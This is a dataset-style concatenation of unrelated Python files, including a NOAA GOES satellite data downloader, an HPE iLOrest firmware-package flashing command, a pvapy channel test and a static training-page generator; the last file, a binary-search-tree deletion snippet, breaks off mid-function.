selectcolor.pack(fill=BOTH)
save.pack(fill=BOTH)
tabControl.pack(side=TOP, fill=X)
# Bind the canvas actions
imsegcanvas.bind("<Double-1>", point)
# imsegcanvas.bind("<Button-1>",bbox)
imsegcanvas.bind("<Button-3>", genpolygon)
imsegcanvas.bind("<B1-Motion>", outline)
imsegcanvas.bind("<Button-2>", clearcanvas)
#--------------------------------------------------------------------------------------------------
imsegcanvas.pack()
App.mainloop()
1751973 | <filename>server/wrappers/StorageService.py
from abc import ABC, abstractmethod
class StorageService(ABC):
@abstractmethod
def test_connection(api):
pass
@abstractmethod
def saveData(data):
pass
@abstractmethod
def insert_node(data):
pass
@abstractmethod
def insert_edge(data):
pass
@abstractmethod
def queryData(*args):
pass
| StarcoderdataPython |
3328890 | #!/usr/bin/python
import GTFBasics
import sys
# Pre: A GTF filename, for a file with 'exon' features, and 'gene_id' and 'transcript_id' attributes.
# Post: Prints to stdout a genepred with transcripts
def main():
    """CLI entry point: convert a GTF file to genePred on stdout.

    Expects a GTF with 'exon' features carrying 'gene_id' and
    'transcript_id' attributes; prints usage to stderr when no
    filename argument is given.
    """
    if len(sys.argv) < 2:
        sys.stderr.write("gtf_to_genepred.py <gtf filename>\n")
        return
    gtf = GTFBasics.GTFFile(sys.argv[1])
    gtf.write_genepred(sys.stdout)


# Fix: guard the call so importing this module no longer runs the
# conversion as a side effect.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
3318160 | <reponame>Mog333/CMPUT551_ML_Project<gh_stars>0
# Merge score values with their IDs into a tab-separated file.
# Fixes: context managers guarantee the handles are closed even on error;
# iterating the files in lockstep handles any line count (the original
# hard-coded exactly 4000 rows and padded with blanks past EOF); the
# unused `parsing` flag is removed.
with open("finalScore2.txt") as scores, \
        open("tes") as ids, \
        open("final.csv", "w") as output:
    for score, score_id in zip(scores, ids):
        output.write(str(score_id.strip()) + "\t" + str(score.strip()) + "\n")
| StarcoderdataPython |
40265 | from pvapy import Channel, CA, PvTimeStamp, PvAlarm
# Smoke-test script: exercise alarm/timeStamp puts on the 'DBRdouble'
# record through both the default (pvAccess) provider and Channel Access.
print('DBRdouble')
channel = Channel('DBRdouble')
timestamp = PvTimeStamp(10, 100)
alarm = PvAlarm(1, 1, "mess")
print(channel.get('value'))
print('here 1')
# 'record[process=false]' presumably suppresses record processing on the
# put — confirm against the pvAccess request-syntax documentation.
channel.put(alarm, 'record[process=false]field(alarm)')
print('here 2')
print(channel.get('value'))
channel.put(timestamp, 'record[process=false]field(timeStamp)')
print(channel.get('value'))
print('here 3')
# Repeat the same sequence over the Channel Access provider.
print('DBRdouble CA')
channel = Channel('DBRdouble', CA)
print(channel.get('value'))
print('here 4')
channel.put(alarm, 'record[process=false]field(alarm)')
print('here 5')
print(channel.get('value'))
channel.put(timestamp, 'record[process=false]field(timeStamp)')
print(channel.get('value'))
print('here 6')
| StarcoderdataPython |
3360215 | <filename>GOES/downloads/download_data.py
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------------------------------------------------------------
'''
Description: Downloads GOES-16/17 data from amazon
Author: <NAME>
E-mail: <EMAIL>
Created date: Mar 23, 2020
Modification date: Feb 22, 2021
'''
#-----------------------------------------------------------------------------------------------------------------------------------
import numpy as np
import s3fs
from datetime import *
import requests
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
#-----------------------------------------------------------------------------------------------------------------------------------
def show_products():
    """Print the product folders available for GOES-16 and GOES-17.

    Lists each satellite's top-level S3 folders via anonymous access.
    """
    print(' ')
    for satellite in ('goes16', 'goes17'):
        print('Products for ' + satellite + ':')
        filesystem = s3fs.S3FileSystem(anon=True)
        for entry in filesystem.ls('s3://noaa-' + satellite + '/'):
            basename = entry.split('/')[-1]
            if basename == 'index.html':
                print(' ')
            else:
                print('\t' + basename)
    print('Descriptions of each product is shown in https://docs.opendata.aws/noaa-goes16/cics-readme.html#about-the-data \n')
#-----------------------------------------------------------------------------------------------------------------------------------
def download_file(URL, name_file, path_out, retries=10, backoff=10, size_format='Decimal', show_download_progress=True):
    '''
    Save data in file.

    Parameters
    ----------
    URL : str
        Link of file.
    name_file : str
        Name of output file.
    path_out : str, optional, default ''
        Path of folder where file will be saved.
    retries : int, optional, default 10
        Defines the retries number to connect to server.
        See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
    backoff: int, optional, default 10
        A backoff factor to apply between attempts after the second try.
        See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
    size_format: str, optional, default 'Decimal'
        Defines how is print the size of file.
        Options are:
            'Decimal' : divide file size (in bytes) by (1000*1000)
            'Binary' : divide file size (in bytes) by (1024*1024)
    show_download_progress : boolean, optional, default True
        Parameter to enable and disable the visualization of download progress.
    '''
    StartTime = datetime.now()
    # Retry transparently on transient 5xx server errors with backoff.
    retries_config = Retry(total=retries, backoff_factor=backoff, status_forcelist=[500, 502, 503, 504])
    session = requests.Session()
    session.mount('http://', HTTPAdapter(max_retries=retries_config))
    session.mount('https://', HTTPAdapter(max_retries=retries_config))
    req = session.get(URL, stream=True)
    #req = requests.get(URL, stream=True)
    # NOTE(review): assumes a successful response carrying a Content-Length
    # header; a final error response raises KeyError here rather than a
    # clear HTTP error (no raise_for_status) — confirm acceptable.
    total_size = int(req.headers['content-length'])
    size = 0
    if size_format == 'Binary':
        dsize = 1024*1024
    else:
        dsize = 1000*1000
    with open(path_out+name_file, 'wb') as output_file:
        # Stream in 1 KiB chunks; `size` accumulates bytes actually written.
        for chunk in req.iter_content(chunk_size=1024):
            if chunk:
                rec_size = output_file.write(chunk)
                size = rec_size + size
                if show_download_progress == True:
                    # Carriage return keeps the progress display on one line.
                    print(' {} {:3.0f}% {:.1f}MB {}'.format(name_file, 100.0*size/total_size, size/dsize, '{}m{}s'.format(round((datetime.now()-StartTime).seconds/60.0), (datetime.now()-StartTime).seconds%60) if (datetime.now()-StartTime).seconds > 60 else '{}s'.format((datetime.now()-StartTime).seconds)), end="\r")  #, flush=True)
                    #print('\t{}\t{:3.0f}%\t{:.2f} min'.format(name_file,100.0*size/total_size, (datetime.now()-StartTime).seconds/60.0), end="\r") #, flush=True)
        # Print the final (newline-terminated) progress line once complete.
        if size == total_size:
            #print('\n')
            print(' {} {:3.0f}% {:.1f}MB {}'.format(name_file, 100.0*size/total_size, size/dsize, '{}m{}s'.format(round((datetime.now()-StartTime).seconds/60.0), (datetime.now()-StartTime).seconds%60) if (datetime.now()-StartTime).seconds > 60 else '{}s'.format((datetime.now()-StartTime).seconds)))
            #print('\b')
#-----------------------------------------------------------------------------------------------------------------------------------
def download(Satellite, Product, DateTimeIni=None, DateTimeFin=None, domain=None, channel=None, rename_fmt=False, path_out='', retries=10, backoff=10, size_format='Decimal', show_download_progress=True):
    '''
    Download data of GOES-16 and GOES-17 from Amazon server.
    This function is based on the code of
    blaylockbk https://gist.github.com/blaylockbk/d60f4fce15a7f0475f975fc57da9104d

    Parameters
    ----------
    Satellite : str
        Indicates serie of GOES, the options are 'goes16' and 'goes17'
    Product : str
        Indicates the instrument and level of product. The products
        can be list using: GOES.show_products()
    DateTimeIni : str
        String that indicates the initial datetime. Its structure
        must be yyyymmdd-HHMMSS
        Example:
            DateTimeIni='20180520-183000'
    DateTimeFin : str
        String that indicates the final datetime. Its structure
        must be yyyymmdd-HHMMSS
        Example:
            DateTimeFin='20180520-183000'
    domain : str
        This parameter just is necessary with Mesoescale products.
        The options are:
            M1 : Mesoscale 1
            M2 : Mesoscale 2
    channel : list
        This parameter just is necessary with ABI-L1b-Rad and ABI-L2-CMIP products.
        List indicates the channel or channels that will be download.
        The channels can be mentioned individually as elements of the list
        or as a sequence of channels separated by a hyphen ('-').
        Example:
            channel = ['02','08','09','10','11','13']
            channel = ['02','08-11','13']
    rename_fmt : boolean or str, optional, default False
        Is an optional parameter and its default value is rename_fmt=False which
        indicates that the file name is kept. If would you like that the file name
        just keep the start time of scan you have to define the format of datetime.
        See the next link to know about datetime format:
        https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes).
        Example:
            rename_fmt = '%Y%m%d%H%M%S'
            rename_fmt = '%Y%m%d%H%M'
            rename_fmt = '%Y%j%H%M'
    path_out : str, optional, default ''
        Optional string that indicates the folder where data will be download.
        The default value is folder where python was open.
    retries: int, optional, default 10
        Defines the retries number to connect to server.
        See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
    backoff: int, optional, default 10
        A backoff factor to apply between attempts after the second try.
        See: https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#module-urllib3.util.retry
    size_format: str, optional, default 'Decimal'
        It defines how is print the size of file.
        Options are:
            'Decimal' : divide file size (in bytes) by (1000*1000)
            'Binary' : divide file size (in bytes) by (1024*1024)
    show_download_progress : boolean, optional, default True
        Parameter to enable and disable the visualization of download progress.

    Return
    ------
    Download_files : list
        List with the downloaded files (path+filename).
        NOTE(review): on validation failure the function prints a message
        and returns None instead of raising or returning [] — callers must
        handle both. Also note `assert`-based validation disappears when
        Python runs with -O.
    '''
    # ---------- Satellite -------------------
    try:
        assert Satellite == 'goes16' or Satellite == 'goes17'
    except AssertionError:
        print('\nSatellite should be goes16 or goes17\n')
        return
    else:
        # NOTE(review): `Sat` is assigned but never used afterwards.
        if Satellite == 'goes16':
            Sat = 'G16'
        elif Satellite == 'goes17':
            Sat = 'G17'
    # ---------- Product and Domain -------------------
    # Mesoscale products ('...M') need the domain suffix (M1/M2) appended.
    if Product[-1] == 'M':
        try:
            assert domain == 'M1' or domain == 'M2'
        except AssertionError:
            print("\nProduct domain is mesoscale so you need define domain='M1' or domain='M2'\n")
            return
        else:
            if domain == 'M1':
                Product2 = Product+'1'
            elif domain == 'M2':
                Product2 = Product+'2'
    else:
        Product2 = Product
    # ---------- DateTimeIni -------------------
    try:
        assert DateTimeIni != None
    except AssertionError:
        print('\nYou must define initial DateTimeIni\n')
        return
    else:
        DateTimeIni = datetime.strptime(DateTimeIni, '%Y%m%d-%H%M%S')
    # ---------- DateTimeFin -------------------
    if DateTimeFin == None:
        DateTimeFin = DateTimeIni
    else:
        DateTimeFin = datetime.strptime(DateTimeFin, '%Y%m%d-%H%M%S')
    # ---------- channel -------------------
    # Expand entries like '08-11' into ['08', '09', '10', '11'].
    if Product[:-1] in ['ABI-L1b-Rad', 'ABI-L2-CMIP']:
        try:
            assert channel != None
        except AssertionError:
            print('\nYou must define channel or channels\n')
            return
        else:
            try:
                assert isinstance(channel, list) == True
            except AssertionError:
                print('\nChannel must be a list\n')
                return
            else:
                ChannelList = []
                for item in channel:
                    try:
                        assert isinstance(item, str) == True
                    except AssertionError:
                        print('\nEach elements of channel must have string format\n')
                        return
                    else:
                        try:
                            assert len(item) == 2 or len(item) == 5
                        except AssertionError:
                            print('\nElement of channel must be string with two or five characters\n')
                            return
                        else:
                            if len(item) == 2:
                                ChannelList.append(item)
                            elif len(item) == 5:
                                ChIni, ChEnd = item.split('-')
                                for Chn in range(int(ChIni), int(ChEnd)+1):
                                    ChannelList.append('{:02d}'.format(Chn))
    #if download_info == 'minimal' or download_info == 'full':
    #   print('channel list: {}'.format(ChannelList))
    #"""
    Downloaded_files = []
    if show_download_progress == True:
        print('Files:')
    # ---------- Loop -------------------
    # Walk hour-by-hour through the S3 folder layout (YYYY/DDD/HH/) and
    # keep only files whose scan-start timestamp falls inside the window.
    DateTimeIniLoop = DateTimeIni.replace(minute=0)
    DateTimeFinLoop = DateTimeFin.replace(minute=0)+timedelta(minutes=60)
    while DateTimeIniLoop < DateTimeFinLoop:
        DateTimeFolder = DateTimeIniLoop.strftime('%Y/%j/%H/')
        server = 's3://noaa-'+Satellite+'/'+Product+'/'
        fs = s3fs.S3FileSystem(anon=True)
        ListFiles = np.array(fs.ls(server+DateTimeFolder))
        for line in ListFiles:
            if Product[:-1] in ['ABI-L1b-Rad', 'ABI-L2-CMIP']:
                NameFile = line.split('/')[-1]
                # Channel id is the last two chars of the second '_' field.
                ChannelFile = NameFile.split('_')[1][-2:]
                # Scan-start time sits between the '_s' and '_e' markers.
                DateTimeFile = datetime.strptime(NameFile[NameFile.find('_s')+2:NameFile.find('_e')-1], '%Y%j%H%M%S')
                if Product2 in NameFile and ChannelFile in ChannelList and DateTimeIni <= DateTimeFile <= DateTimeFin:
                    if rename_fmt == False:
                        NameOut = NameFile
                    else:
                        NameOut = NameFile[:NameFile.find('_s')+2] + DateTimeFile.strftime(rename_fmt) + '.nc'
                    #print(ChannelFile, DateTimeFile, NameOut)
                    download_file('https://noaa-'+Satellite+'.s3.amazonaws.com'+line[len('noaa-'+Satellite):], NameOut, path_out, retries=retries, backoff=backoff, size_format=size_format, show_download_progress=show_download_progress)
                    Downloaded_files.append(path_out+NameOut)
            else:
                NameFile = line.split('/')[-1]
                DateTimeFile = datetime.strptime(NameFile[NameFile.find('_s')+2:NameFile.find('_e')-1], '%Y%j%H%M%S')
                if Product2 in NameFile and DateTimeIni <= DateTimeFile <= DateTimeFin:
                    if rename_fmt == False:
                        NameOut = NameFile
                    else:
                        NameOut = NameFile[:NameFile.find('_s')+2] + DateTimeFile.strftime(rename_fmt) + '.nc'
                    #print(DateTimeFile, NameOut)
                    download_file('https://noaa-'+Satellite+'.s3.amazonaws.com'+line[len('noaa-'+Satellite):], NameOut, path_out, retries=retries, backoff=backoff, size_format=size_format, show_download_progress=show_download_progress)
                    Downloaded_files.append(path_out+NameOut)
        DateTimeIniLoop = DateTimeIniLoop + timedelta(minutes=60)
    Downloaded_files.sort()
    return Downloaded_files;
#-----------------------------------------------------------------------------------------------------------------------------------
| StarcoderdataPython |
4840924 | <reponame>LaudateCorpus1/python-redfish-utility
# ##
# Copyright 2016-2021 <NAME>, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ##
# -*- coding: utf-8 -*-
""" Fwpkg Command for rdmc """
import os
import json
import shutil
import zipfile
import tempfile
import ctypes
from ctypes import c_char_p, c_int, c_bool
from redfish.hpilo.risblobstore2 import BlobStore2
from rdmc_helper import (
IncompatibleiLOVersionError,
ReturnCodes,
Encryption,
InvalidCommandLineErrorOPTS,
InvalidCommandLineError,
InvalidFileInputError,
UploadError,
TaskQueueError,
FirmwareUpdateError,
)
def _get_comp_type(payload):
"""Get's the component type and returns it
:param payload: json payload of .fwpkg file
:type payload: dict.
:returns: returns the type of component. Either A,B,C, or D.
:rtype: string
"""
ctype = ""
if "Uefi" in payload["UpdatableBy"] and "RuntimeAgent" in payload["UpdatableBy"]:
ctype = "D"
else:
for device in payload["Devices"]["Device"]:
for image in device["FirmwareImages"]:
if "DirectFlashOk" not in list(image.keys()):
raise InvalidFileInputError("Cannot flash this firmware.")
if image["DirectFlashOk"]:
ctype = "A"
if image["ResetRequired"]:
ctype = "B"
break
elif image["UefiFlashable"]:
ctype = "C"
break
else:
ctype = "D"
return ctype
class FwpkgCommand:
    """Fwpkg command class.

    Fixes applied:
    - in ``run`` the "invalid file type" InvalidFileInputError was
      constructed but never raised, so non-.fwpkg inputs slipped through;
      it is now raised.
    - two bare ``except:`` clauses narrowed to ``except Exception:`` so
      KeyboardInterrupt/SystemExit are no longer swallowed.
    """

    def __init__(self):
        self.ident = {
            "name": "flashfwpkg",
            "usage": None,
            "description": "Run to upload and flash "
            "components from fwpkg files.\n\n\tUpload component and flashes it or sets a task"
            "queue to flash.\n\texample: flashfwpkg component.fwpkg.\n\n\t"
            "Skip extra checks before adding taskqueue. (Useful when adding "
            "many flashfwpkg taskqueue items in sequence.)\n\texample: flashfwpkg "
            "component.fwpkg --ignorechecks",
            "summary": "Flashes fwpkg components using the iLO repository.",
            "aliases": ["fwpkg"],
            "auxcommands": [
                "UploadComponentCommand",
                "UpdateTaskQueueCommand",
                "FirmwareUpdateCommand",
                "FwpkgCommand",
            ],
        }
        self.cmdbase = None
        self.rdmc = None
        self.auxcommands = dict()

    def run(self, line, help_disp=False):
        """Main fwpkg worker function

        :param line: string of arguments passed in
        :type line: str.
        :param help_disp: display help flag
        :type line: bool.
        """
        if help_disp:
            self.parser.print_help()
            return ReturnCodes.SUCCESS
        try:
            (options, _) = self.rdmc.rdmc_parse_arglist(self, line)
            if not line or line[0] == "help":
                self.parser.print_help()
                return ReturnCodes.SUCCESS
        except (InvalidCommandLineErrorOPTS, SystemExit):
            if ("-h" in line) or ("--help" in line):
                return ReturnCodes.SUCCESS
            else:
                raise InvalidCommandLineErrorOPTS("")
        self.fwpkgvalidation(options)
        if self.rdmc.app.typepath.defs.isgen9:
            raise IncompatibleiLOVersionError(
                "iLO Repository commands are only available on iLO 5."
            )
        if self.rdmc.app.getiloversion() <= 5.120 and options.fwpkg.lower().startswith(
            "iegen10"
        ):
            raise IncompatibleiLOVersionError(
                "Please upgrade to iLO 5 1.20 or "
                "greater to ensure correct flash of this firmware."
            )
        tempdir = ""
        if not options.fwpkg.endswith(".fwpkg"):
            # FIX: previously the exception was instantiated but not raised.
            raise InvalidFileInputError(
                "Invalid file type. Please make sure the file "
                "provided is a valid .fwpkg file type."
            )
        try:
            components, tempdir, comptype = self.preparefwpkg(self, options.fwpkg)
            if comptype == "D":
                raise InvalidFileInputError("Unable to flash this fwpkg file.")
            elif comptype == "C":
                try:
                    self.taskqueuecheck()
                except TaskQueueError as excp:
                    if options.ignore:
                        self.rdmc.ui.warn(str(excp) + "\n")
                    else:
                        raise excp
            self.applyfwpkg(options, tempdir, components, comptype)
            if comptype == "A":
                message = "Firmware has successfully been flashed.\n"
                if "ilo" in options.fwpkg.lower():
                    message += (
                        "iLO will reboot to complete flashing. Session will be"
                        " terminated.\n"
                    )
            elif comptype == "B":
                message = (
                    "Firmware has successfully been flashed and a reboot is required for "
                    "this firmware to take effect.\n"
                )
            elif comptype == "C":
                message = "This firmware is set to flash on reboot.\n"
            self.rdmc.ui.printer(message)
        except (FirmwareUpdateError, UploadError) as excp:
            raise excp
        finally:
            # Always remove the temporary extraction directory.
            if tempdir:
                shutil.rmtree(tempdir)
        self.cmdbase.logout_routine(self, options)
        # Return code
        return ReturnCodes.SUCCESS

    def taskqueuecheck(self):
        """Check taskqueue for potential issues before starting"""
        select = "ComputerSystem."
        results = self.rdmc.app.select(selector=select, path_refresh=True)
        try:
            results = results[0]
        except Exception:
            pass
        powerstate = results.resp.dict["PowerState"]
        tasks = self.rdmc.app.getcollectionmembers(
            "/redfish/v1/UpdateService/UpdateTaskQueue/"
        )
        for task in tasks:
            if task["State"] == "Exception":
                raise TaskQueueError(
                    "Exception found in taskqueue which will "
                    "prevent firmware from flashing. Please run "
                    "iLOrest command: taskqueue --cleanqueue to clear"
                    " any errors before continuing."
                )
            if (
                task["UpdatableBy"] == "Uefi"
                and not powerstate == "Off"
                or task["Command"] == "Wait"
            ):
                raise TaskQueueError(
                    "Taskqueue item found that will "
                    "prevent firmware from flashing immediately. Please "
                    "run iLOrest command: taskqueue --resetqueue to "
                    "reset the queue if you wish to flash immediately "
                    "or include --ignorechecks to add this firmware "
                    "into the task queue anyway."
                )
        if tasks:
            self.rdmc.ui.warn(
                "Items are in the taskqueue that may delay the flash until they "
                "are finished processing. Use the taskqueue command to monitor updates.\n"
            )

    @staticmethod
    def preparefwpkg(self, pkgfile):
        """Prepare fwpkg file for flashing

        :param pkgfile: Location of the .fwpkg file
        :type pkgfile: string.
        :returns: returns the files needed to flash, directory they are located
                  in, and type of file.
        :rtype: string, string, string
        """
        files = []
        imagefiles = []
        payloaddata = None
        tempdir = tempfile.mkdtemp()
        try:
            zfile = zipfile.ZipFile(pkgfile)
            zfile.extractall(tempdir)
            zfile.close()
        except Exception as excp:
            raise InvalidFileInputError("Unable to unpack file. " + str(excp))
        files = os.listdir(tempdir)
        if "payload.json" in files:
            with open(os.path.join(tempdir, "payload.json"), encoding="utf-8") as pfile:
                data = pfile.read()
            payloaddata = json.loads(data)
        else:
            raise InvalidFileInputError("Unable to find payload.json in fwpkg file.")
        comptype = _get_comp_type(payloaddata)
        if comptype == "C":
            imagefiles = [
                self.auxcommands["flashfwpkg"].type_c_change(tempdir, pkgfile)
            ]
        else:
            results = self.rdmc.app.getprops(
                selector="UpdateService.", props=["Oem/Hpe/Capabilities"]
            )
            for device in payloaddata["Devices"]["Device"]:
                for firmwareimage in device["FirmwareImages"]:
                    if firmwareimage["FileName"] not in imagefiles:
                        imagefiles.append(firmwareimage["FileName"])
            # For local (blobstore) connections on iLOs that advertise
            # UpdateFWPKG, a FWPKG 2.0 bundle is uploaded whole.
            if (
                "blobstore" in self.rdmc.app.redfishinst.base_url
                and comptype in ["A", "B"]
                and results
                and "UpdateFWPKG" in results[0]["Oem"]["Hpe"]["Capabilities"]
            ):
                dll = BlobStore2.gethprestchifhandle()
                dll.isFwpkg20.argtypes = [c_char_p, c_int]
                dll.isFwpkg20.restype = c_bool
                with open(pkgfile, "rb") as fwpkgfile:
                    fwpkgdata = fwpkgfile.read()
                fwpkg_buffer = ctypes.create_string_buffer(fwpkgdata)
                if dll.isFwpkg20(fwpkg_buffer, 2048):
                    imagefiles = [pkgfile]
                    tempdir = ""
        return imagefiles, tempdir, comptype

    def type_c_change(self, tdir, pkgloc):
        """Special changes for type C

        :param tdir: path to temp directory
        :type tdir: string.
        :param pkgloc: location of the .fwpkg file
        :type pkgloc: string.
        :returns: The location of the type C file to upload
        :rtype: string.
        """
        shutil.copy(pkgloc, tdir)
        fwpkgfile = os.path.split(pkgloc)[1]
        zfile = fwpkgfile[:-6] + ".zip"
        zipfileloc = os.path.join(tdir, zfile)
        os.rename(os.path.join(tdir, fwpkgfile), zipfileloc)
        return zipfileloc

    def applyfwpkg(self, options, tempdir, components, comptype):
        """Apply the component to iLO

        :param options: command line options
        :type options: list.
        :param tempdir: path to temp directory
        :type tempdir: string.
        :param components: components to upload
        :type components: list.
        :param comptype: type of component. Either A,B,C, or D.
        :type comptype: str.
        """
        for component in components:
            taskqueuecommand = " create %s " % os.path.basename(component)
            if options.tover:
                taskqueuecommand = " create %s --tpmover" % os.path.basename(component)
            if component.endswith(".fwpkg") or component.endswith(".zip"):
                uploadcommand = "--component %s" % component
            else:
                uploadcommand = "--component %s" % os.path.join(tempdir, component)
            if options.forceupload:
                uploadcommand += " --forceupload"
            if comptype in ["A", "B"]:
                uploadcommand += " --update_target --update_repository"
            if options.update_srs:
                uploadcommand += " --update_srs"
            self.rdmc.ui.printer(
                "Uploading firmware: %s\n" % os.path.basename(component)
            )
            try:
                ret = self.auxcommands["uploadcomp"].run(uploadcommand)
                if ret != ReturnCodes.SUCCESS:
                    raise UploadError
            except UploadError:
                if comptype in ["A", "B"]:
                    # Surface the iLO-side firmware-update error details.
                    select = self.rdmc.app.typepath.defs.hpilofirmwareupdatetype
                    results = self.rdmc.app.select(selector=select)
                    try:
                        results = results[0]
                    except Exception:
                        pass
                    if results:
                        update_path = results.resp.request.path
                        error = self.rdmc.app.get_handler(update_path, silent=True)
                        self.auxcommands["firmwareupdate"].printerrmsg(error)
                    else:
                        raise FirmwareUpdateError(
                            "Error occurred while updating the firmware."
                        )
                else:
                    raise UploadError("Error uploading component.")
            if comptype == "C":
                self.rdmc.ui.warn(
                    "Setting a taskqueue item to flash UEFI flashable firmware.\n"
                )
                self.auxcommands["taskqueue"].run(taskqueuecommand)

    def fwpkgvalidation(self, options):
        """fwpkg validation function

        :param options: command line options
        :type options: list.
        """
        self.rdmc.login_select_validation(self, options)

    def definearguments(self, customparser):
        """Wrapper function for new command main function

        :param customparser: command line input
        :type customparser: parser.
        """
        if not customparser:
            return
        self.cmdbase.add_login_arguments_group(customparser)
        customparser.add_argument(
            "fwpkg", help="""fwpkg file path""", metavar="[FWPKG]"
        )
        customparser.add_argument(
            "--forceupload",
            dest="forceupload",
            action="store_true",
            help="Add this flag to force upload firmware with the same name "
            "already on the repository.",
            default=False,
        )
        customparser.add_argument(
            "--ignorechecks",
            dest="ignore",
            action="store_true",
            help="Add this flag to ignore all checks to the taskqueue "
            "before attempting to process the .fwpkg file.",
            default=False,
        )
        customparser.add_argument(
            "--tpmover",
            dest="tover",
            action="store_true",
            help="If set then the TPMOverrideFlag is passed in on the "
            "associated flash operations",
            default=False,
        )
        customparser.add_argument(
            "--update_srs",
            dest="update_srs",
            action="store_true",
            help="Add this flag to update the System Recovery Set with the uploaded firmware. "
            "NOTE: This requires an account login with the system recovery set privilege.",
            default=False,
        )
| StarcoderdataPython |
1607539 | #!/usr/bin/env python2
# coding: utf-8
TEMPLATE="""<html>
<head>
<title>{{ title }}</title>
<link rel="stylesheet" href="index.css">
</head>
<body>
<div class="main">
<table>
<tr><td class="header" colspan="3">{{ title }}</td></tr>
{% if coming_soon %}
<tr><td class="title" colspan="3">Coming soon near you</td></tr>
{% for item in coming_soon %}
<tr>
<td>{{ item.title }}</td>
<td>{% if item.slides %}<a class="slides" href="{{ item.slides }}" />{% endif %}</td>
<td><a class="attend" href="{{ item.attend }}" /></td>
</tr>
<tr>
<td class="details">Scheduled {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% endif %}
{% if past_workshops %}
<tr><td class="title" colspan="3">Past workshops</td></tr>
{% for item in past_workshops[:5] %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
<td>{% if item.video %}<a class="video" href="{{ item.video }}" />{% endif %}</td>
</tr>
<tr>
<td class="details">Delivered {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% if past_workshops[5:] %}
<tr>
<td>... and at least <a href="past.html">{{ past_workshops[5:] | length }} more</a>.</td>
</tr>
{% endif %}
{% endif %}
{% if recorded_workshops %}
<tr><td class="title" colspan="3">Recorded workshops</td></tr>
{% for item in recorded_workshops %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
<td><a class="video" href="{{ item.video }}" /></td>
</tr>
<tr>
<td class="details">Delivered {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% endif %}
{% if self_paced %}
<tr><td class="title" colspan="3">Self-paced tutorials</td></tr>
{% for item in self_paced %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
</tr>
{% endfor %}
{% endif %}
{% if all_past_workshops %}
<tr><td class="title" colspan="3">Past workshops</td></tr>
{% for item in all_past_workshops %}
<tr>
<td>{{ item.title }}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
{% if item.video %}
<td><a class="video" href="{{ item.video }}" /></td>
{% endif %}
</tr>
<tr>
<td class="details">Delivered {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
</tr>
{% endfor %}
{% endif %}
<tr><td class="spacer"></td></tr>
<tr>
<td class="footer">
Maintained by <NAME> (<a href="https://twitter.com/jpetazzo">@jpetazzo</a>) and <a href="https://github.com/jpetazzo/container.training/graphs/contributors">contributors</a>.
</td>
</tr>
</table>
</div>
</body>
</html>""".decode("utf-8")
# Render index.html and past.html from index.yaml using the TEMPLATE string
# defined above (Python 2 era code: note the .decode/.encode round-trips).
import datetime
import jinja2
import yaml
# NOTE(review): yaml.load without an explicit Loader is unsafe on untrusted
# input and deprecated in PyYAML >= 5.1 -- consider yaml.safe_load.
items = yaml.load(open("index.yaml"))
for item in items:
    if "date" in item:
        date = item["date"]
        # English ordinal suffix for the day of the month.
        suffix = {
            1: "st", 2: "nd", 3: "rd",
            21: "st", 22: "nd", 23: "rd",
            31: "st"}.get(date.day, "th")
        # %e is a non-standard extension (it displays the day, but without a
        # leading zero). If strftime fails with ValueError, try to fall back
        # on %d (which displays the day but with a leading zero when needed).
        try:
            item["prettydate"] = date.strftime("%B %e{}, %Y").format(suffix)
        except ValueError:
            item["prettydate"] = date.strftime("%B %d{}, %Y").format(suffix)
today = datetime.date.today()
# Partition items: dated future events, dated past events (newest first),
# undated self-paced tutorials, and anything carrying a recording.
coming_soon = [i for i in items if i.get("date") and i["date"] >= today]
coming_soon.sort(key=lambda i: i["date"])
past_workshops = [i for i in items if i.get("date") and i["date"] < today]
past_workshops.sort(key=lambda i: i["date"], reverse=True)
self_paced = [i for i in items if not i.get("date")]
recorded_workshops = [i for i in items if i.get("video")]
template = jinja2.Template(TEMPLATE)
with open("index.html", "w") as f:
    f.write(template.render(
        title="Container Training",
        coming_soon=coming_soon,
        past_workshops=past_workshops,
        self_paced=self_paced,
        recorded_workshops=recorded_workshops
    ).encode("utf-8"))
# past.html lists every past workshop (index.html shows only the first five).
with open("past.html", "w") as f:
    f.write(template.render(
        title="Container Training",
        all_past_workshops=past_workshops
    ).encode("utf-8"))
| StarcoderdataPython |
1648985 | <filename>Binary_Search_Tree/2-bst-deletion.py
class Node:
    """A single binary-search-tree node holding a key and two child links."""

    def __init__(self, key):
        self.key = key      # value stored at this node
        self.left = None    # left subtree (keys < key, per insert below)
        self.right = None   # right subtree (keys >= key)
def inorder(root):
    """Print the keys of the tree rooted at `root` in sorted (in-order) order."""
    if root is None:
        return
    inorder(root.left)
    print(root.key, end=" ")
    inorder(root.right)
def insert(node, key):
    """Insert `key` into the BST rooted at `node` and return the root.

    Duplicate keys are placed in the right subtree, matching the
    recursive version this replaces.
    """
    if node is None:
        return Node(key)
    current = node
    while True:
        if key < current.key:
            if current.left is None:
                current.left = Node(key)
                break
            current = current.left
        else:
            if current.right is None:
                current.right = Node(key)
                break
            current = current.right
    return node
def deleteNode(root, key):
